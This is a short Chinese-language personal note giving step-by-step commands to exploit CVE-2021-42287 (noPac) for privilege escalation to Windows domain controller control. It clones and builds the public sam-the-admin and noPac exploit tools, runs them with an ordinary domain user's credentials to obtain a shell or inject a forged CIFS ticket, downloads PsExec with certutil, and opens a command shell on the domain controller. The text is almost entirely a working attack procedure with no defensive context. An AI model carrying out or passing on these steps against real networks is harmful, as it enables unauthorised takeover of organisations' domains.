【笔记】CVE-2021-42287漏洞利用

前言

CVE-2021-42287漏洞利用,实现Windows域控提权

准备工作

  • 拥有域用户权限

safebuffer/sam-the-admin

下载项目

1
2
git clone https://github.com/safebuffer/sam-the-admin.git
cd sam-the-admin

下载依赖

1
2
3
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

漏洞利用

:域名
:域普通用户用户名
:域普通用户密码
-dc-ip <domain_controller_ip_or_hostname>:指定域控制器IP地址或主机名

1
python3 sam_the_admin.py <domain_name>/<domain_user_username>:<domain_user_password> -dc-ip <domain_controller_ip_or_hostname> -shell

cube0x0/noPac

下载psexec

1
2
certutil -urlcache -split -f https://download.sysinternals.com/files/PSTools.zip
"C:\Program Files\7-Zip\7z.exe" x PSTools.zip -oPSTools

下载项目

1
2
git clone https://github.com/cube0x0/noPac.git
cd noPac

编译项目

1
2
msbuild noPac.sln -p:Configuration=Release
cd .\bin\Release

扫描

1
.\noPac.exe scan -domain <domain> -user <username> -pass <password>

漏洞利用

/dc <domain>:指定域控
/mAccount <username_new>:创建新用户的用户名
/mPassword <username_new>:创建新用户的密码

1
.\noPac.exe -domain <domain> -user <username> -pass <password> /dc <domain> /mAccount <username_new> /mPassword <password_new> /service cifs /ptt

查看凭据

1
klist

通过PsExec建立连接

<domain>:域控

1
PSTools\PsExec.exe \\<domain> cmd

完成